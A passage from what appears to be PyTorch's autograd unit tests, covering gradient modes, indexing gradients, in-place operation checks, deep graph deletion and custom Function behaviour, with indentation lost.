ctx.save_for_backward(b)
return b * 2
@staticmethod
def backward(ctx, grad_b):
b, = ctx.saved_tensors
self.assertEqual(b.output_nr, 1)
TestFn.apply(b).sum().backward()
def test_free_deep_graph(self):
def scope():
depth = 150000
x = torch.randn(1, requires_grad=True)
y = x.clone()
# build a "chain" computation graph
for _ in range(depth):
y = y + y * 0.000001
# graph deletion occurs when the above locals go out of scope.
# In this case `del y` will trigger it but it's easier to leave
# it to Python to delete the locals.
# Should not stack overflow
scope()
def test_free_deep_graph_complicated(self):
def scope():
depth = 100000
randchoice = torch.randint(2, [depth, 2])
x = torch.randn(1, requires_grad=True)
y = x.clone()
# Hold the two previous values
prev_values = [None, None]
# Build a "chain with skip connections" graph
for _ in range(depth):
prev_tensors = [tensor for tensor in prev_values[:-1]
if tensor is not None]
prev_values.append(y)
prev_values.pop(0)
# Definitely pick one tensor to add
y += y * 0.000001
# Possibly add other tensors
nprev = len(prev_tensors)
if nprev == 2:
y += randchoice[depth].mul(torch.cat(prev_tensors)).sum()
# graph deletion occurs when the above locals go out of scope.
# Should not stack overflow
scope()
def test_free_deep_graph_pyfunction(self):
class MyOp(Function):
@staticmethod
def forward(ctx, tensor1, tensor2):
return tensor1 + tensor2
@staticmethod
def backward(ctx, grad_output):
return grad_output, grad_output
def scope():
depth = 150000
x = torch.randn(1, requires_grad=True)
y = x.clone()
# build deeply nested computation graph
for _ in range(depth):
y = MyOp.apply(y, y)
# graph deletion occurs when the above locals go out of scope.
# Should not stack overflow
scope()
def test_no_unnecessary_save(self):
# If we kept x in the derivative Function of x * 2 we would
# get an error in the backward that would complain that we've
# modified x, which was needed for gradient computation.
# Since we should elide unnecessary saves, this test should pass.
mu = torch.ones(1, requires_grad=True)
x = torch.empty(1)
loss = 0
for i in range(3):
x.detach_()
x.copy_(mu + i)
ft = torch.tensor([float(i)])
multiplied = x * ft
s = multiplied.sum()
loss += s
loss.backward()
def test_no_grad(self):
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5) * 4
with torch.no_grad():
w = x + y
@torch.no_grad()
def adder(x, y):
return x + y
z = adder(x, y)
self.assertFalse(w.requires_grad)
self.assertRaises(RuntimeError, lambda: w.backward(torch.ones(5, 5)))
self.assertIsNone(w.grad_fn)
self.assertFalse(z.requires_grad)
self.assertRaises(RuntimeError, lambda: z.backward(torch.ones(5, 5)))
self.assertIsNone(z.grad_fn)
# test nested decorator and with-statement on no_grad
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
w = adder(x, y)
self.assertFalse(torch.is_grad_enabled())
def test_set_grad_generator_functions(self):
@torch.no_grad()
def gen_no_grad():
for i in range(10):
self.assertEqual(torch.is_grad_enabled(), False)
yield i
with torch.enable_grad():
for _ in gen_no_grad():
self.assertEqual(torch.is_grad_enabled(), True)
@torch.enable_grad()
def gen_enable_grad():
for i in range(10):
self.assertEqual(torch.is_grad_enabled(), True)
yield i
with torch.no_grad():
for _ in gen_enable_grad():
self.assertEqual(torch.is_grad_enabled(), False)
def test_set_grad_generator_functions_recursive(self):
# enable_grad_decorator_recursive and no_grad_decorator_recursive call each other
# recursively, to ensure that the decorators preserve the caller's setting
@torch.enable_grad()
def enable_grad_decorator_recursive(depth):
self.assertTrue(torch.is_grad_enabled())
if depth > 0:
no_grad_decorator_recursive(depth - 1)
self.assertTrue(torch.is_grad_enabled())
@torch.no_grad()
def no_grad_decorator_recursive(depth):
self.assertFalse(torch.is_grad_enabled())
if depth > 0:
enable_grad_decorator_recursive(depth - 1)
self.assertFalse(torch.is_grad_enabled())
# enable_grad_context_manager_recursive and no_grad_context_manager_recursive call
# each other recursively, to ensure that the decorators preserve the caller's setting
def enable_grad_context_manager_recursive(depth):
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
if depth > 0:
no_grad_context_manager_recursive(depth - 1)
self.assertTrue(torch.is_grad_enabled())
def no_grad_context_manager_recursive(depth):
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
if depth > 0:
enable_grad_context_manager_recursive(depth - 1)
self.assertFalse(torch.is_grad_enabled())
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
enable_grad_decorator_recursive(10)
self.assertTrue(torch.is_grad_enabled())
enable_grad_context_manager_recursive(10)
self.assertTrue(torch.is_grad_enabled())
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
enable_grad_decorator_recursive(10)
self.assertFalse(torch.is_grad_enabled())
enable_grad_context_manager_recursive(10)
self.assertFalse(torch.is_grad_enabled())
def test_set_grad_coroutines(self):
@torch.no_grad()
def coro_no_grad(n=10):
self.assertFalse(torch.is_grad_enabled())
for i in range(n):
self.assertFalse(torch.is_grad_enabled())
r = yield i
self.assertFalse(torch.is_grad_enabled())
self.assertEqual(i, r)
self.assertFalse(torch.is_grad_enabled())
@torch.enable_grad()
def coro_enable_grad(n=10):
self.assertTrue(torch.is_grad_enabled())
for i in range(n):
self.assertTrue(torch.is_grad_enabled())
r = yield i
self.assertTrue(torch.is_grad_enabled())
self.assertEqual(i, r)
self.assertTrue(torch.is_grad_enabled())
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
coro, r = coro_no_grad(), None
try:
while True:
self.assertTrue(torch.is_grad_enabled())
r = coro.send(r)
self.assertTrue(torch.is_grad_enabled())
except StopIteration:
pass
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
coro, r = coro_enable_grad(), None
try:
while True:
self.assertFalse(torch.is_grad_enabled())
r = coro.send(r)
self.assertFalse(torch.is_grad_enabled())
except StopIteration:
pass
def test_set_grad_coroutines_benign_exceptions(self):
class RecoverableException(Exception):
pass
@torch.no_grad()
def coro_no_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertFalse(torch.is_grad_enabled())
yield (-i if has_raised else i)
except RecoverableException:
self.assertFalse(torch.is_grad_enabled())
has_raised = True
@torch.enable_grad()
def coro_enable_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertTrue(torch.is_grad_enabled())
yield (-i if has_raised else i)
except RecoverableException:
self.assertTrue(torch.is_grad_enabled())
has_raised = True
with torch.enable_grad():
coro = coro_no_grad()
assert 0 == next(coro)
try:
while True:
r = coro.throw(RecoverableException)
self.assertLess(r, 0)
except StopIteration:
pass
with torch.no_grad():
coro = coro_enable_grad()
assert 0 == next(coro)
try:
while True:
r = coro.throw(RecoverableException)
self.assertLess(r, 0)
except StopIteration:
pass
def test_set_grad_coroutines_critical_exceptions(self):
class UnrecoverableException(Exception):
pass
class SecondaryException(Exception):
pass
@torch.no_grad()
def coro_no_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertFalse(torch.is_grad_enabled())
yield (-i if has_raised else i)
except UnrecoverableException:
self.assertFalse(torch.is_grad_enabled())
raise SecondaryException
@torch.enable_grad()
def coro_enable_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertTrue(torch.is_grad_enabled())
yield (-i if has_raised else i)
except UnrecoverableException:
self.assertTrue(torch.is_grad_enabled())
raise SecondaryException
with torch.enable_grad():
coro = coro_no_grad()
assert 0 == next(coro)
with self.assertRaises(SecondaryException):
coro.throw(UnrecoverableException)
with torch.no_grad():
coro = coro_enable_grad()
assert 0 == next(coro)
with self.assertRaises(SecondaryException):
coro.throw(UnrecoverableException)
def test_set_grad_coroutines_exit(self):
@torch.no_grad()
def coro_no_grad(state):
for i in range(10):
try:
self.assertFalse(torch.is_grad_enabled())
yield i
except GeneratorExit:
self.assertFalse(torch.is_grad_enabled())
state.add('GeneratorExit')
raise
@torch.enable_grad()
def coro_enable_grad(state):
for i in range(10):
try:
self.assertTrue(torch.is_grad_enabled())
yield i
except GeneratorExit:
self.assertTrue(torch.is_grad_enabled())
state.add('GeneratorExit')
raise
state = set()
with torch.enable_grad():
coro = coro_no_grad(state)
for i in range(5):
next(coro)
coro.close()
self.assertTrue('GeneratorExit' in state)
state = set()
with torch.no_grad():
coro = coro_enable_grad(state)
for i in range(5):
next(coro)
coro.close()
self.assertTrue('GeneratorExit' in state)
def test_no_grad_python_function(self):
"""Python Functions should respect grad mode."""
x = torch.ones(5, 5, requires_grad=True)
class MyOp(Function):
@staticmethod
def forward(self, x):
return x + 1
@staticmethod
def backward(self, dy):
return dy
with torch.no_grad():
y = MyOp.apply(x)
self.assertFalse(y.requires_grad)
def test_indexing(self):
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
def compare(x, y, idx, indexed_tensor, indexed_var):
indexed_var_t = indexed_var.data
if not isinstance(indexed_tensor, torch.Tensor):
indexed_var_t = indexed_var_t[0]
self.assertEqual(indexed_tensor, indexed_var_t)
indexed_var.sum().backward()
expected_grad = torch.empty(x.size()).fill_(0)
expected_grad[idx] = 1
self.assertEqual(y.grad, expected_grad)
def check_index(x, y, idx):
if y.grad is not None:
with torch.no_grad():
y.grad.zero_()
indexed_tensor = x[idx]
indexed_var = y[idx]
compare(x, y, idx, indexed_tensor, indexed_var)
check_index(x, y, 1)
check_index(x, y, (1, 1))
check_index(x, y, slice(1, None))
check_index(x, y, slice(None, 2))
check_index(x, y, (slice(None, 2), 2))
check_index(x, y, (slice(1, 2), 2))
check_index(x, y, (1, slice(2, None)))
check_index(x, y, (slice(None, None), slice(2, None)))
check_index(x, y, torch.LongTensor([0, 2]))
check_index(x, y, torch.rand(4, 4).bernoulli().bool())
check_index(x, y, (Ellipsis, slice(2, None)))
check_index(x, y, ([0], [0]))
check_index(x, y, ([1, 2, 3], [0]))
check_index(x, y, ([1, 2], [2, 1]))
check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 3]]))
check_index(x, y, ([slice(None), [2, 3]]))
check_index(x, y, ([[2, 3], slice(None)]))
# advanced indexing, with less dim, or ellipsis
check_index(x, y, ([0]))
check_index(x, y, ([0], ))
x = torch.arange(1., 49).view(4, 3, 4)
y = Variable(x, requires_grad=True)
check_index(x, y, (slice(None), [0], [0]))
check_index(x, y, ([0], [0], slice(None)))
check_index(x, y, (slice(None), [0, 1, 2], [0]))
check_index(x, y, ([0, 1, 2], [0], slice(None)))
check_index(x, y, (slice(None), [1, 2], [2, 1]))
check_index(x, y, ([1, 2], [2, 1], slice(None)))
check_index(x, y, (slice(None), [[1, 2], [2, 0]], [[0, 1], [2, 3]]))
check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 2]], slice(None)))
check_index(x, y, (slice(None), slice(None), [2, 1]))
check_index(x, y, (slice(None), [2, 1], slice(None)))
check_index(x, y, ([2, 1], slice(None), slice(None)))
# advanced indexing, with less dim, or ellipsis
check_index(x, y, ([0], ))
check_index(x, y, ([0], slice(None)))
check_index(x, y, ([0], Ellipsis))
check_index(x, y, ([1, 2], [0, 1]))
check_index(x, y, ([1, 2], [0, 1], Ellipsis))
check_index(x, y, (Ellipsis, [1, 2], [0, 1]))
# advanced indexing, with a tensor wrapped in a variable
z = torch.LongTensor([0, 1])
zv = Variable(z, requires_grad=False)
seq = [z, Ellipsis]
seqv = [zv, Ellipsis]
if y.grad is not None:
with torch.no_grad():
y.grad.zero_()
indexed_tensor = x[seq]
indexed_var = y[seqv]
compare(x, y, seq, indexed_tensor, indexed_var)
def test_indexing_duplicates(self):
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = torch.LongTensor([1, 1, 3, 2, 1, 2])
y[idx].sum().backward()
expected_grad = torch.zeros(4, 4)
for i in idx:
expected_grad[i] += 1
self.assertEqual(y.grad, expected_grad)
# with advanced indexing
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = [[1, 1, 3, 2, 1, 2], [0]]
y[idx].sum().backward()
expected_grad = torch.zeros(4, 4)
for i in idx[0]:
for j in idx[1]:
expected_grad[i][j] += 1
self.assertEqual(y.grad, expected_grad)
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = [[[1, 2], [0, 0]], [[0, 1], [1, 1]]]
y[idx].sum().backward()
expected_grad = torch.tensor([[0., 2., 0., 0.],
[1., 0., 0., 0.],
[0., 1., 0., 0.],
[0., 0., 0., 0.]])
self.assertEqual(y.grad, expected_grad)
x = torch.arange(1., 65).view(4, 4, 4)
y = Variable(x, requires_grad=True)
idx = [[1, 1, 1], slice(None), slice(None)]
y[idx].sum().backward()
expected_grad = torch.empty(4, 4, 4).zero_()
expected_grad[1].fill_(3)
self.assertEqual(y.grad, expected_grad)
def test_index_backward_does_not_save_tensor(self):
# Example from https://github.com/pytorch/pytorch/issues/24853.
# if `index(tensor, indices)` saves `tensor` for backwards, then it will
# trigger a version check on `tensor` during the backward pass, which
# will cause the following code to error because `tensor` gets modified
# by the indexing line.
a = torch.tensor([1., 0, 0])
b = torch.zeros(3, requires_grad=True)
tensor = b + 0
tensor[a != 0] = tensor[a != 0]
tensor.backward(torch.zeros_like(tensor))
def test_volatile_deprecated(self):
v = torch.autograd.torch.randn(3, 3)
with warnings.catch_warnings(record=True) as w:
self.assertFalse(v.volatile)
self.assertIn('volatile', str(w[0].message))
def test_saved_variables_deprecated(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, tensor2):
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + tensor2
@staticmethod
def backward(ctx, grad_output):
var1, var2 = ctx.saved_variables
return (grad_output, grad_output)
with warnings.catch_warnings(record=True) as warns:
warnings.simplefilter("always")
x = torch.randn((3, 3), requires_grad=True)
y = torch.randn((3, 3), requires_grad=True)
MyFunction.apply(x, y).sum().backward()
has_deprecated = map(lambda warn:
'deprecated' in str(warn) and
'saved_variables' in str(warn),
warns)
has_deprecated = reduce(lambda x, y: x or y, has_deprecated)
self.assertTrue(has_deprecated)
def test_requires_grad(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5)
z = torch.randn(5, 5, requires_grad=True)
a = x + y
self.assertFalse(a.requires_grad)
b = a + z
self.assertTrue(b.requires_grad)
def error():
raise RuntimeError
# Make sure backward isn't called on these
a._backward_hooks = OrderedDict()
x._backward_hooks = OrderedDict()
y._backward_hooks = OrderedDict()
a._backward_hooks['test'] = error
x._backward_hooks['test'] = error
y._backward_hooks['test'] = error
b.backward(torch.ones(5, 5))
def test_requires_grad_(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5, requires_grad=True)
self.assertIs(x, x.requires_grad_())
self.assertTrue(x.requires_grad)
self.assertIs(y, y.requires_grad_())
self.assertTrue(y.requires_grad)
self.assertIs(x, x.requires_grad_(True))
self.assertTrue(x.requires_grad)
self.assertIs(y, y.requires_grad_(True))
self.assertTrue(y.requires_grad)
z = x * y
self.assertRaises(RuntimeError, lambda: z.requires_grad_(False))
self.assertIs(z, z.requires_grad_())
self.assertTrue(z.requires_grad)
self.assertIs(z, z.requires_grad_(True))
self.assertTrue(z.requires_grad)
self.assertIs(x, x.requires_grad_(False))
self.assertFalse(x.requires_grad)
self.assertIs(y, y.requires_grad_(False))
self.assertFalse(y.requires_grad)
def test_requires_grad_inplace(self):
a = torch.randn(5, 5)
b = torch.randn(5, 5, requires_grad=True)
a += b
self.assertTrue(a.requires_grad)
# non-leaf
a = torch.randn(5, 5) + 0
b = torch.randn(5, 5, requires_grad=True)
a += b
self.assertTrue(a.requires_grad)
def test_no_requires_grad_inplace(self):
# basic case, should be able to modify inplace while requires_grad is False
a = torch.randn(2, 3)
a.add_(5)
a.requires_grad = True
a.sum().backward()
self.assertEqual(a.grad, torch.ones(2, 3))
# same but with a view
a = torch.randn(2, 3)
b = a[:]
b.add_(5)
a.requires_grad = True
a.sum().backward()
self.assertEqual(a.grad, torch.ones(2, 3))
# should fail if requires_grad = True when we modify inplace
a = torch.randn(2, 3)
b = a[:]
a.requires_grad = True
with self.assertRaises(RuntimeError):
a.add_(5)
with self.assertRaises(RuntimeError):
b.add_(5)
def test_attribute_deletion(self):
x = torch.randn((5, 5), requires_grad=True)
del x.grad
self.assertIsNone(x.grad)
with self.assertRaises(RuntimeError):
del x.data
with self.assertRaises(TypeError):
x.data = None
with self.assertRaises(RuntimeError):
del x.requires_grad
with self.assertRaises(RuntimeError):
del x._grad_fn
with self.assertRaises(RuntimeError):
del x._backward_hooks
def test_duplicate_backward_root(self):
a = torch.randn(5, 5, requires_grad=True)
b = torch.randn(5, 5, requires_grad=True)
x = a * b
grad_output = torch.randn_like(x)
torch.autograd.backward([x, x], [grad_output, grad_output])
self.assertEqual(a.grad, b * grad_output * 2)
self.assertEqual(b.grad, a * grad_output * 2)
def test_backward_no_grad(self):
a = torch.randn(5, 5, requires_grad=True)
b = a + 2
with self.assertRaises(RuntimeError):
torch.autograd.backward([b], [None])
def test_backward_twice_with_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
self.assertRaisesRegex(RuntimeError, 'Specify retain_graph=True',
lambda: c.backward(torch.tensor([1, 1, 1], dtype=torch.double)))
def test_backward_twice_retained_graph_with_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double), retain_graph=True)
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_twice_without_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = b + 1
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_twice_retained_graph_without_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double), retain_graph=True)
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_create_graph_warns(self):
try:
prev = torch.is_warn_always_enabled()
torch.set_warn_always(True)
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = b * b
with warnings.catch_warnings(record=True) as ws:
c.backward(torch.ones_like(c), create_graph=True)
b.grad = None
self.assertTrue(any('Using backward() with create_graph=True' in str(w.message) for w in ws))
# Should not warn for grad
with warnings.catch_warnings(record=True) as ws:
torch.autograd.grad(c, b, torch.ones_like(c), create_graph=True)
self.assertFalse(any('Using backward() with create_graph=True' in str(w.message) for w in ws))
finally:
torch.set_warn_always(prev)
def test_next_functions(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
a = x + y
self.assertIsNotNone(a.grad_fn)
next_functions = a.grad_fn.next_functions
self.assertEqual(len(next_functions), 2)
self.assertIsInstance(next_functions[0][0], torch._C._functions.AccumulateGrad)
self.assertEqual(next_functions[0][1], 0)
self.assertIsInstance(next_functions[1][0], torch._C._functions.AccumulateGrad)
self.assertEqual(next_functions[1][1], 0)
b = a + 5
next_functions = b.grad_fn.next_functions
self.assertEqual(len(next_functions), 2)
self.assertIs(next_functions[0][0], a.grad_fn)
self.assertIs(next_functions[1][0], None)
def test_inplace(self):
x = torch.ones(5, 5, requires_grad=True)
y = Variable(torch.ones(5, 5) * 4, requires_grad=True)
z = x * y
q = z + y
w = z * y
z.add_(2)
# Add doesn't need it's inputs to do backward, so it shouldn't raise
q.backward(torch.ones(5, 5), retain_graph=True)
# Mul saves both inputs in forward, so it should raise
self.assertRaises(RuntimeError, lambda: w.backward(torch.ones(5, 5)))
z = x * y
q = z * y
r = z + y
w = z.add_(y)
# w is a the last expression, so this should succeed
w.backward(torch.ones(5, 5), retain_graph=True)
# r doesn't use the modified value in backward, so it should succeed
r.backward(torch.ones(5, 5), retain_graph=True)
# q uses dirty z, so it should raise
self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5)))
with torch.no_grad():
x.grad.zero_()
m = x / 2
z = m + y / 8
q = z * y
r = z + y
prev_version = z._version
w = z.exp_()
self.assertNotEqual(z._version, prev_version)
r.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(x.grad, torch.ones(5, 5) / 2)
w.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(x.grad, torch.empty(5, 5).fill_((1 + math.e) / 2))
self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5)))
leaf = torch.ones(5, 5, requires_grad=True)
x = leaf.clone()
x.add_(10)
self.assertEqual(x, torch.ones(5, 5) * 11)
# x should be still usable
y = x + 2
y.backward(torch.ones(5, 5))
self.assertEqual(leaf.grad, torch.ones(5, 5))
z = x * y
x.add_(2)
self.assertRaises(RuntimeError, lambda: z.backward(torch.ones(5, 5)))
def test_mark_non_differentiable(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
output = input > 0
ctx.mark_non_differentiable(output)
return output
@staticmethod
def backward(ctx, grad_output):
return (grad_output * 0).to(torch.double)
x = torch.randn(5, 5, requires_grad=True)
mask = MyFunction.apply(x)
self.assertFalse(mask.requires_grad)
y = x.masked_fill(mask, 0)
y.sum().backward()
def test_mark_non_differentiable_mixed(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
a = input + 1
b = input + 2
ctx.mark_non_differentiable(a)
return a, b
@staticmethod
def backward(ctx, grad_a, grad_b):
self.assertTrue((grad_a == 0).all())
self.assertTrue((grad_b == 1).all())
return grad_b
x = torch.randn(5, 5, requires_grad=True)
a, b = MyFunction.apply(x)
self.assertFalse(a.requires_grad)
self.assertTrue(b.requires_grad)
b.sum().backward()
self.assertEqual(x.grad, torch.ones(5, 5))
def test_mark_non_differentiable_none(self):
# This used to segfault because MyFunction would send back null
# gradients to MulBackward, which is implemented in C++. C++
# implemented functions expect incoming grad_ouptuts to be non-null.
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
output = input.clone()
ctx.mark_non_differentiable(output)
return output
@staticmethod
def backward(ctx, grad_output):
return None
x = torch.randn(5, 5, requires_grad=True)
r = MyFunction.apply(x * x)
(r * x).sum().backward()
def test_return_duplicate(self):
class DoubleDuplicate(Function):
@staticmethod
def forward(ctx, x):
output = x * 2
return output, output
@staticmethod
def backward(ctx, grad1, grad2):
return grad1 * 2 + grad2 * 2
def fn(x):
a, b = DoubleDuplicate.apply(x)
self.assertIs(a, b)
return a + b
x = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(fn, [x])
gradgradcheck(fn, [x])
def test_return_duplicate_inplace(self):
class DoubleInplace(Function):
@staticmethod
def forward(ctx, x):
x.mul_(2)
ctx.mark_dirty(x)
return x, x
@staticmethod
def backward(ctx, grad1, grad2):
return grad1 * 2 + grad2 * 2
def inplace_fn(x):
a, b = DoubleInplace.apply(x.clone())
self.assertIs(a, b)
return a + b
x = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(inplace_fn, [x])
gradgradcheck(inplace_fn, [x])
# Can't modify leaf variables in-place
self.assertRaises(RuntimeError, lambda: InplaceFunction.apply(x))
# Functions which modify views in-place must return only one output
self.assertRaises(RuntimeError, lambda: InplaceFunction.apply(x.clone()[0]))
def _test_setitem(self, size, index):
x = torch.ones(*size, requires_grad=True)
y = x + 2
y_version = y._version
y[index] = 2
self.assertNotEqual(y._version, y_version)
y.backward(torch.ones(*size))
expected_grad = torch.ones(*size)
expected_grad[index] = 0
self.assertEqual(x.grad, expected_grad)
def _test_setitem_tensor(self, size, index):
x = torch.ones(*size, requires_grad=True)
y = x + 2
y_version = y._version
value = x.new(x[index].size()).fill_(7)
value.requires_grad = True
y[index] = value
self.assertNotEqual(y._version, y_version)
y.backward(torch.ones(*size))
expected_grad_input = torch.ones(*size)
expected_grad_input[index] = 0
self.assertEqual(x.grad, expected_grad_input)
self.assertEqual(value.grad, torch.ones_like(value))
# case when x broadcasts to as y[1]
x = torch.randn(4, requires_grad=True)
y = torch.zeros(2, 3, 4)
y[1] = x
y.backward(torch.randn(2, 3, 4))
self.assertEqual(x.size(), x.grad.size())
def test_setitem(self):
self._test_setitem((5, 5), 1)
self._test_setitem((5,), 1)
self._test_setitem((1,), 0)
self._test_setitem((10,), [[0, 4, 2]])
self._test_setitem((5, 5), [[0, 4], [2, 2]])
self._test_setitem((5, 5, 5), [slice(None), slice(None), [1, 3]])
self._test_setitem((5, 5, 5), [slice(None), [1, 3], slice(None)])
self._test_setitem((5, 5, 5), [[1, 3], slice(None), slice(None)])
self._test_setitem((5, 5, 5), [slice(None), [2, 4], [1, 3]])
self._test_setitem((5, 5, 5), [[1, 3], [2, 4], slice(None)])
self._test_setitem_tensor((5, 5), 3)
self._test_setitem_tensor((5, 5), [[0, 1], [1, 0]])
self._test_setitem_tensor((5,), 3)
self._test_setitem_tensor((5,), Variable(torch.LongTensor([3]), requires_grad=False).sum())
self._test_setitem_tensor((5,), [[0, 1, 2, 3]])
self._test_setitem_tensor((5, 5, 5), [slice(None), slice(None), [1, 3]])
self._test_setitem_tensor((5, 5, 5), [slice(None), [1, 3], slice(None)])
self._test_setitem_tensor((5, 5, 5), [[1, 3], slice(None), slice(None)])
self._test_setitem_tensor((5, 5, 5), [slice(None), [2, 4], [1, 3]])
self._test_setitem_tensor((5, 5, 5), [[1, 3], [2, 4], slice(None)])
self._test_setitem_tensor((5, 5, 5), [Variable(torch.LongTensor([1,
3]), requires_grad=False), [2, 4], slice(None)])
def test_setitem_mask(self):
mask = torch.BoolTensor(5, 5).bernoulli_()
self._test_setitem((5, 5), Variable(mask))
self._test_setitem((5,), Variable(mask[0]))
self._test_setitem((1,), Variable(mask[0, 0:1]))
self._test_setitem_tensor((5, 5), Variable(mask))
self._test_setitem_tensor((5,), Variable(mask[0]))
def test_select_sum(self):
# both select and sum return Scalars in ATen; ensure they work together.
x = torch.randn(10, dtype=torch.double, requires_grad=True)
def func(x):
return x.select(0, 1).sum()
gradcheck(func, [x])
gradgradcheck(func, [x])
def test_diagonal_expanded_v(self):
value = torch.rand([])
v_expanded = torch.tensor(value).expand(10)
a = torch.rand(10, 10, dtype=torch.double, requires_grad=True)
result, = torch.autograd.grad(a.diagonal(), a, v_expanded)
self.assertEqual(result, torch.eye(10, dtype=torch.double) * value)
def test_select_expanded_v(self):
v_expanded = torch.rand(10).expand(10, 10)
a = torch.rand(10, 10, 10, requires_grad=True)
result, = torch.autograd.grad(a[0], a, v_expanded)
expected = torch.zeros(10, 10, 10)
expected[0] = v_expanded
self.assertEqual(result, expected)
def test_slice_expanded_v(self):
v_expanded = torch.rand(10, 1).expand(2, 10, 10)
a = torch.rand(10, 10, 10, requires_grad=True)
result, = torch.autograd.grad(a[3:5], a, v_expanded)
expected = torch.zeros(10, 10, 10)
expected[3:5] = v_expanded
self.assertEqual(result, expected)
def test_unused_output(self):
x = torch.randn(10, 10, requires_grad=True)
outputs = x.chunk(5)
o = outputs[2]
o = o * 4 + 2
o.sum().backward()
expected_grad = torch.zeros(10, 10)
expected_grad[4:6] = 4
self.assertEqual(x.grad, expected_grad)
with torch.no_grad():
x.grad.zero_()
grad_output = torch.randn(2, 10)
outputs = x.chunk(5)
outputs[0].backward(grad_output)
expected_grad = torch.zeros(10, 10)
expected_grad[:2] = grad_output
self.assertEqual(x.grad, expected_grad)
# TODO: opinfo this or move to the sparse test suite
def _test_sparse_gather(self, size_x, size_ind, dim):
x = torch.randn(size_x, requires_grad=True)
if len(size_ind) > 0 and len(size_x) > 0:
ind = torch.randint(x.size(dim), size_ind)
else:
ind = torch.zeros(size_ind, dtype=torch.int64)
out = torch.gather(x, dim, ind, sparse_grad=False)
grad = torch.rand_like(out)
out.backward(grad)
grad_dense = x.grad.clone()
x.grad = None
out = torch.gather(x, dim, ind, sparse_grad=True)
out.backward(grad)
self.assertEqual(grad_dense, x.grad.to_dense())
def test_sparse_gather_dim0(self):
self._test_sparse_gather((10, 10), (5, 10), 0)
def test_sparse_gather_dim1(self):
self._test_sparse_gather((10, 10, 5), (10, 5, 5), 1)
def test_sparse_gather_dim_neg(self):
self._test_sparse_gather((10, 10, 5), (10, 10, 2), -1)
def test_sparse_gather_ind_scalar(self):
self._test_sparse_gather((10,), (), 0)
def test_sparse_gather_x_scalar(self):
self._test_sparse_gather((), (2,), 0)
def test_sparse_gather_both_scalar(self):
self._test_sparse_gather((), (), 0)
def test_gc_in_destructor(self):
"""
Previously, if a Function destructor triggered a garbage collection,
the Variable's tp_dealloc handler would get called twice leading to a
segfault.
"""
class CollectOnDelete(Function):
def forward(self, x):
return x
def backward(self, grad_output):
return grad_output
def __del__(self):
gc.collect()
for _ in range(10):
CollectOnDelete().forward(torch.randn(1, requires_grad=True)).backward()
def test_naughty_autograd_function_attribute_access(self):
class Id(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad_x):
return grad_x
with self.assertWarnsRegex(DeprecationWarning, "should not be instantiated"):
f = Id()
# # After raising warning, should still return an instance
self.assertIsInstance(f, Id)
x = torch.zeros(1, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, "non-static forward method is deprecated"):
f(x)
t = Id.apply(x)
self.assertEqual(t.grad_fn.name(), "IdBackward")
# THPFunction is the base class of both grad_fn and autograd functions,
# which means that a lot of accessors on them may segfault. Test that we
# properly error in this case.
t = torch.ones(1, requires_grad=True)
t._backward_hooks = dict()
with self.assertRaisesRegex(RuntimeError, "Attribute '_register_hook_dict' is invalid"):
f._register_hook_dict(t)
with self.assertRaisesRegex(RuntimeError, "Attribute 'register_hook' is invalid"):
f.register_hook(lambda x, y: None)
with self.assertRaisesRegex(RuntimeError, "Attribute 'next_functions' is invalid"):
f.next_functions
with self.assertRaisesRegex(RuntimeError, "Attribute 'name' is invalid"):
f.name()
with self.assertRaisesRegex(RuntimeError, "underlying PyNode has already been deallocated"):
f.metadata
@unittest.expectedFailure
def test_naughty_anomaly_access(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
